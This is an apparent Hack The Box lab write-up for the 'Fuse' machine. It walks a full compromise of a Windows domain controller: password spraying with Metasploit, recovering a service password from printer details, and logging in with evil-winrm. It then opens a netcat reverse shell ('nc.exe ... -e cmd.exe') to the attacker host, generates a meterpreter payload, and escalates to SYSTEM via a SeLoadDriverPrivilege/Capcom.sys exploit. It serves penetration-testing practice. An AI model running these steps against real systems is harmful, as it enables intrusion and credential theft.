Fuse

HTB Writeup

Lets start with a Nmap Scan:

root@liberty:/home/kali# nmap -Pn -sC -sV fuse.htb
Starting Nmap 7.80 ( https://nmap.org ) 
Nmap scan report for fuse.htb (10.129.2.5)
Host is up (0.022s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
80/tcp   open  http         Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-10-09 13:58:10Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: FABRICORP)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=10/9%Time=5F8068D4%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Take notice to the domain :

Domain: fabricorp.local

Its at this point with most HTB Machines that I'll add the hostname to /etc/hosts

echo "X.X.X.X   fuse.fabricorp.local"  >> /etc/hosts
echo "X.X.X.X   fuse.htb"  >> /etc/hosts

Now lets enumerate the box with SMBClient & Enum4Linux:

kali@liberty:~$ enum4linux fuse.htb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Oct  9 09:46:19 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... fuse.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ================================================ 
|    Enumerating Workgroup/Domain on fuse.htb    |
 ================================================ 
[E] Can't find workgroup/domain


 ======================================== 
|    Nbtstat Information for fuse.htb    |
 ======================================== 
Looking up status of 10.129.2.5
No reply from 10.129.2.5

kali@liberty:~$ smbclient -L fuse.htb
Enter WORKGROUP\kali's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

Now lets take a port 80. After adding our host's FQDN to our /etc/hosts file we should get this page:

After downloading and grepping the cvs files we now have the following usernames:

root@liberty:/home/kali# cat users.txt 
tlavel
sthompson
bhult
pmerton

Lets make a simple word list to accompany our newly found users. We can do this using cewl. CeWL is a tool which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.

kali@liberty:~$ cewl -d 5 -m 3 -w wordlist http://fuse.htb/papercut/logs/html/index.htm --with-numbers 
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
kali@liberty:~$ cat wordlist 
Print
2020
PaperCut
MFT01
PCL6
Logs
LETTER
NOT
DUPLEX
GRAYSCALE
Logger
papercut
com
CSV
Excel
Notepad
http
www
Size
sthompson
May
LONWK019
...

To check these credentials against the SMB service using Metasploit:

msf5 auxiliary(scanner/smb/smb_login) > set pass_file wordlist
pass_file => wordlist
msf5 auxiliary(scanner/smb/smb_login) > set user
set user_as_pass   set user_file      set userpass_file  
msf5 auxiliary(scanner/smb/smb_login) > set user_file users.txt
user_file => users.txt
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS fuse.htb
RHOSTS => fuse.htb
msf5 auxiliary(scanner/smb/smb_login) > run

Using this module we discover we have working creds!!!

[+] 10.129.2.5:445        - 10.129.2.5:445 - Success: '.\tlavel:Fabricorp01'
[+] 10.129.2.5:445        - 10.129.2.5:445 - Success: '.\bhult:Fabricorp01'

Lets circle back on our enumeration now that we have working creds!

root@liberty:/home/kali# smbclient -L fuse.htb -U tlavel
Enter WORKGROUP\bhult's password: 
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

These creds worked in the metasploit module why arent they are working now? Just just go with the error message and change the password. We can to this with smbpasswd:

So there is a password policy enforced so I changed my password to Fabricorp02:

root@liberty:/home/kali# smbpasswd -r fuse.htb -U tlavel
Old SMB password:
New SMB password:
Retype new SMB password:
machine fuse.htb rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria..
root@liberty:/home/kali# smbpasswd -r fuse.htb -U bhult
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user bhult on fuse.htb.

root@liberty:/home/kali# smbclient -L fuse.htb -U tlavel
Enter WORKGROUP\bhult's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	HP-MFT01        Printer   HP-MFT01
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	print$          Disk      Printer Drivers
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

Tried connecting over powershell but wasn't getting anywhere so I moved on to using rpcclinet, another great tool for enumeration.

PS /home/kali> New-PSSession -ComputerName fuse.htb -Credential tvlavel  

PowerShell credential request
Enter your credentials.
Password for user tvlavel: ************

New-PSSession: MI_RESULT_ACCESS_DENIED

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]

rpcclient $> enumprivs
found 35 privileges

SeCreateTokenPrivilege 		0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 		0:3 (0x0:0x3)
SeLockMemoryPrivilege 		0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 		0:5 (0x0:0x5)
SeMachineAccountPrivilege 		0:6 (0x0:0x6)
SeTcbPrivilege 		0:7 (0x0:0x7)
SeSecurityPrivilege 		0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 		0:9 (0x0:0x9)
SeLoadDriverPrivilege 		0:10 (0x0:0xa)
SeSystemProfilePrivilege 		0:11 (0x0:0xb)
SeSystemtimePrivilege 		0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege 		0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege 		0:14 (0x0:0xe)
SeCreatePagefilePrivilege 		0:15 (0x0:0xf)
SeCreatePermanentPrivilege 		0:16 (0x0:0x10)
SeBackupPrivilege 		0:17 (0x0:0x11)
SeRestorePrivilege 		0:18 (0x0:0x12)
SeShutdownPrivilege 		0:19 (0x0:0x13)
SeDebugPrivilege 		0:20 (0x0:0x14)
SeAuditPrivilege 		0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege 		0:22 (0x0:0x16)
SeChangeNotifyPrivilege 		0:23 (0x0:0x17)
SeRemoteShutdownPrivilege 		0:24 (0x0:0x18)
SeUndockPrivilege 		0:25 (0x0:0x19)
SeSyncAgentPrivilege 		0:26 (0x0:0x1a)
SeEnableDelegationPrivilege 		0:27 (0x0:0x1b)
SeManageVolumePrivilege 		0:28 (0x0:0x1c)
SeImpersonatePrivilege 		0:29 (0x0:0x1d)
SeCreateGlobalPrivilege 		0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege 		0:31 (0x0:0x1f)
SeRelabelPrivilege 		0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege 		0:33 (0x0:0x21)
SeTimeZonePrivilege 		0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 		0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 		0:36 (0x0:0x24)

Lets take note to the new users we have discovered:

After running through most of the enumeration commands I came across this gem:

rpcclient $> enumprinters
	flags:[0x800000]
	name:[\\10.10.10.193\HP-MFT01]
	description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
	comment:[]

WE have now have another credential!

Since psh is out the window let use evil-winrm:

root@liberty:/home/kali# evil-winrm -u svc-print -p '$fab@s3Rv1ce$1' -i fuse.htb

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents>

We can use these credentials to grab the user flag:

*Evil-WinRM* PS C:\Users\svc-print\Desktop> type user.txt
INSERT FLAG HERE

*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== ==============================================
fabricorp\svc-print S-1-5-21-2633719317-1471316042-3957863514-1104


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
FABRICORP\IT_Accounts                      Group            S-1-5-21-2633719317-1471316042-3957863514-1604 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Now that we access let grab a shell with netcat:

root@liberty:/home/kali# evil-winrm -u svc-print -p '$fab@s3Rv1ce$1' -i fuse.htb -s /home/kali/scripts

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents> upload /usr/share/windows-resources/binaries/nc.exe
Info: Uploading /usr/share/windows-resources/binaries/nc.exe to C:\Users\svc-print\Documents\nc.exe

                                                             
Data: 79188 bytes of 79188 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-print\Documents> nc.exe 10.10.14.34 443 -e cmd.exe
The term 'nc.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ nc.exe 10.10.14.34 443 -e cmd.exe
+ ~~~~~~
    + CategoryInfo          : ObjectNotFound: (nc.exe:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\svc-print\Documents> ./nc.exe 10.10.14.34 443 -e cmd.exe

root@liberty:/home/kali# nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.34] from (UNKNOWN) [10.129.2.5] 63136
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\svc-print\Documents>

Lets begin our privilege escalation question with Windows Exploit Suggester - Next Generation (WES-NG) :

C:\Users\svc-print\Documents>systeminfo.exe > info.txt
systeminfo.exe > info.txt
Access is denied.

Or lets not.

Lets get a meterpreter shell up there while we are at it:

kali@liberty:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.34 LPORT=4444 -f dll shell.dll > shell.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 341 bytes
Final size of dll file: 5120 bytes

*Evil-WinRM* PS C:\Users\svc-print\Documents> upload shell.exe
Info: Uploading shell.exe to C:\Users\svc-print\Documents\shell.exe

                                                             
Data: 98400 bytes of 98400 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-print\Documents> dir


    Directory: C:\Users\svc-print\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/9/2020  10:16 AM          73802 shell.exe
-a----        10/9/2020  10:01 AM          16664 Sherlock.ps1

Next you'll want to create a resource file to quickly launch your handler:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

root@liberty:/home/kali# msfconsole -r shell.rc

*] Processing shell.rc for ERB directives.
resource (shell.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (shell.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (shell.rc)> set LHOST 10.10.14.34
LHOST => 10.10.14.34
resource (shell.rc)> set LPORT 4444
LPORT => 4444
resource (shell.rc)> set ExitOnSession false
ExitOnSession => false
resource (shell.rc)> exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.34:4444 
msf5 exploit(multi/handler) >

We now have the ability to interact with the host via a netcat shell or a meterpreter session.

Now lets get back to our privilege escalation:

https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/

The article mentions these PoC codes

Lets download that and compile them on our Kali machine:

root@liberty:/opt/EoPLoadDriver# x86_64-w64-mingw32-gcc eoploaddriver.cpp -o poc.exe

Now we can reconnect to our machine, upload the exploit and root the box:

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents> cd C:\Temp
*Evil-WinRM* PS C:\Temp> .\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: 00000000, WinError: 0
*Evil-WinRM* PS C:\Temp> .\ExploitCapcom_shell.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000080
[*] Shellcode was placed at 000002138D100008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program

root@liberty:/home/kali/SeLoadDriverPrivilege# nc -nvlp 445
listening on [any] 445 ...
connect to [10.10.14.45] from (UNKNOWN) [10.129.2.5] 50946
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Temp>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
INSERT FLAG HERE

C:\Users\Administrator\Desktop>

PreviousProxmark 3 NextBlunder

Last updated 4 years ago

root@liberty:/home/kali# nmap -Pn -sC -sV fuse.htb Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for fuse.htb (10.129.2.5) Host is up (0.022s latency). Not shown: 988 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? 80/tcp open http Microsoft IIS httpd 10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-10-09 13:58:10Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: FABRICORP) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=10/9%Time=5F8068D4%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

kali@liberty:~$ enum4linux fuse.htb Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Oct 9 09:46:19 2020 ========================== | Target Information | ========================== Target ........... fuse.htb RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ================================================ | Enumerating Workgroup/Domain on fuse.htb | ================================================ [E] Can't find workgroup/domain ======================================== | Nbtstat Information for fuse.htb | ======================================== Looking up status of 10.129.2.5 No reply from 10.129.2.5

kali@liberty:~$ smbclient -L fuse.htb Enter WORKGROUP\kali's password: Anonymous login successful Sharename Type Comment --------- ---- ------- SMB1 disabled -- no workgroup available

kali@liberty:~$ cewl -d 5 -m 3 -w wordlist http://fuse.htb/papercut/logs/html/index.htm --with-numbers CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/) kali@liberty:~$ cat wordlist Print 2020 PaperCut MFT01 PCL6 Logs LETTER NOT DUPLEX GRAYSCALE Logger papercut com CSV Excel Notepad http www Size sthompson May LONWK019 ...

msf5 auxiliary(scanner/smb/smb_login) > set pass_file wordlist pass_file => wordlist msf5 auxiliary(scanner/smb/smb_login) > set user set user_as_pass set user_file set userpass_file msf5 auxiliary(scanner/smb/smb_login) > set user_file users.txt user_file => users.txt msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS fuse.htb RHOSTS => fuse.htb msf5 auxiliary(scanner/smb/smb_login) > run

root@liberty:/home/kali# smbpasswd -r fuse.htb -U tlavel Old SMB password: New SMB password: Retype new SMB password: machine fuse.htb rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria.. root@liberty:/home/kali# smbpasswd -r fuse.htb -U bhult Old SMB password: New SMB password: Retype new SMB password: Password changed for user bhult on fuse.htb.

root@liberty:/home/kali# smbclient -L fuse.htb -U tlavel Enter WORKGROUP\bhult's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share HP-MFT01 Printer HP-MFT01 IPC$ IPC Remote IPC NETLOGON Disk Logon server share print$ Disk Printer Drivers SYSVOL Disk Logon server share SMB1 disabled -- no workgroup available

PS /home/kali> New-PSSession -ComputerName fuse.htb -Credential tvlavel PowerShell credential request Enter your credentials. Password for user tvlavel: ************ New-PSSession: MI_RESULT_ACCESS_DENIED

rpcclient $> enumdomusers user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[svc-print] rid:[0x450] user:[bnielson] rid:[0x451] user:[sthompson] rid:[0x641] user:[tlavel] rid:[0x642] user:[pmerton] rid:[0x643] user:[svc-scan] rid:[0x645] user:[bhult] rid:[0x1bbd] user:[dandrews] rid:[0x1bbe] user:[mberbatov] rid:[0x1db1] user:[astein] rid:[0x1db2] user:[dmuir] rid:[0x1db3] rpcclient $> enumprivs found 35 privileges SeCreateTokenPrivilege 0:2 (0x0:0x2) SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3) SeLockMemoryPrivilege 0:4 (0x0:0x4) SeIncreaseQuotaPrivilege 0:5 (0x0:0x5) SeMachineAccountPrivilege 0:6 (0x0:0x6) SeTcbPrivilege 0:7 (0x0:0x7) SeSecurityPrivilege 0:8 (0x0:0x8) SeTakeOwnershipPrivilege 0:9 (0x0:0x9) SeLoadDriverPrivilege 0:10 (0x0:0xa) SeSystemProfilePrivilege 0:11 (0x0:0xb) SeSystemtimePrivilege 0:12 (0x0:0xc) SeProfileSingleProcessPrivilege 0:13 (0x0:0xd) SeIncreaseBasePriorityPrivilege 0:14 (0x0:0xe) SeCreatePagefilePrivilege 0:15 (0x0:0xf) SeCreatePermanentPrivilege 0:16 (0x0:0x10) SeBackupPrivilege 0:17 (0x0:0x11) SeRestorePrivilege 0:18 (0x0:0x12) SeShutdownPrivilege 0:19 (0x0:0x13) SeDebugPrivilege 0:20 (0x0:0x14) SeAuditPrivilege 0:21 (0x0:0x15) SeSystemEnvironmentPrivilege 0:22 (0x0:0x16) SeChangeNotifyPrivilege 0:23 (0x0:0x17) SeRemoteShutdownPrivilege 0:24 (0x0:0x18) SeUndockPrivilege 0:25 (0x0:0x19) SeSyncAgentPrivilege 0:26 (0x0:0x1a) SeEnableDelegationPrivilege 0:27 (0x0:0x1b) SeManageVolumePrivilege 0:28 (0x0:0x1c) SeImpersonatePrivilege 0:29 (0x0:0x1d) SeCreateGlobalPrivilege 0:30 (0x0:0x1e) SeTrustedCredManAccessPrivilege 0:31 (0x0:0x1f) SeRelabelPrivilege 0:32 (0x0:0x20) SeIncreaseWorkingSetPrivilege 0:33 (0x0:0x21) SeTimeZonePrivilege 0:34 (0x0:0x22) SeCreateSymbolicLinkPrivilege 0:35 (0x0:0x23) SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24)

rpcclient $> enumprinters flags:[0x800000] name:[\\10.10.10.193\HP-MFT01] description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)] comment:[]

root@liberty:/home/kali# evil-winrm -u svc-print -p '$fab@s3Rv1ce$1' -i fuse.htb Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc-print\Documents>

*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami /all USER INFORMATION ---------------- User Name SID =================== ============================================== fabricorp\svc-print S-1-5-21-2633719317-1471316042-3957863514-1104 GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ ============================================== ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group FABRICORP\IT_Accounts Group S-1-5-21-2633719317-1471316042-3957863514-1604 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288 PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeLoadDriverPrivilege Load and unload device drivers Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

root@liberty:/home/kali# evil-winrm -u svc-print -p '$fab@s3Rv1ce$1' -i fuse.htb -s /home/kali/scripts Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc-print\Documents> upload /usr/share/windows-resources/binaries/nc.exe Info: Uploading /usr/share/windows-resources/binaries/nc.exe to C:\Users\svc-print\Documents\nc.exe Data: 79188 bytes of 79188 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\Users\svc-print\Documents> nc.exe 10.10.14.34 443 -e cmd.exe The term 'nc.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:1 + nc.exe 10.10.14.34 443 -e cmd.exe + ~~~~~~ + CategoryInfo : ObjectNotFound: (nc.exe:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException *Evil-WinRM* PS C:\Users\svc-print\Documents> ./nc.exe 10.10.14.34 443 -e cmd.exe

root@liberty:/home/kali# nc -nvlp 443 listening on [any] 443 ... connect to [10.10.14.34] from (UNKNOWN) [10.129.2.5] 63136 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Users\svc-print\Documents>

kali@liberty:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.34 LPORT=4444 -f dll shell.dll > shell.dll [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 341 bytes Final size of dll file: 5120 bytes

*Evil-WinRM* PS C:\Users\svc-print\Documents> upload shell.exe Info: Uploading shell.exe to C:\Users\svc-print\Documents\shell.exe Data: 98400 bytes of 98400 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\Users\svc-print\Documents> dir Directory: C:\Users\svc-print\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 10/9/2020 10:16 AM 73802 shell.exe -a---- 10/9/2020 10:01 AM 16664 Sherlock.ps1

root@liberty:/home/kali# msfconsole -r shell.rc *] Processing shell.rc for ERB directives. resource (shell.rc)> use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp resource (shell.rc)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (shell.rc)> set LHOST 10.10.14.34 LHOST => 10.10.14.34 resource (shell.rc)> set LPORT 4444 LPORT => 4444 resource (shell.rc)> set ExitOnSession false ExitOnSession => false resource (shell.rc)> exploit -j -z [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 10.10.14.34:4444 msf5 exploit(multi/handler) >

Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc-print\Documents> cd C:\Temp *Evil-WinRM* PS C:\Temp> .\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\capcom.sys [+] Enabling SeLoadDriverPrivilege [+] SeLoadDriverPrivilege Enabled [+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService NTSTATUS: 00000000, WinError: 0 *Evil-WinRM* PS C:\Temp> .\ExploitCapcom_shell.exe [*] Capcom.sys exploit [*] Capcom.sys handle was obtained as 0000000000000080 [*] Shellcode was placed at 000002138D100008 [+] Shellcode was executed [+] Token stealing was successful [+] The SYSTEM shell was launched [*] Press any key to exit this program

root@liberty:/home/kali/SeLoadDriverPrivilege# nc -nvlp 445 listening on [any] 445 ... connect to [10.10.14.45] from (UNKNOWN) [10.129.2.5] 50946 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Temp>cd C:\Users\Administrator\Desktop cd C:\Users\Administrator\Desktop C:\Users\Administrator\Desktop>type root.txt type root.txt INSERT FLAG HERE C:\Users\Administrator\Desktop>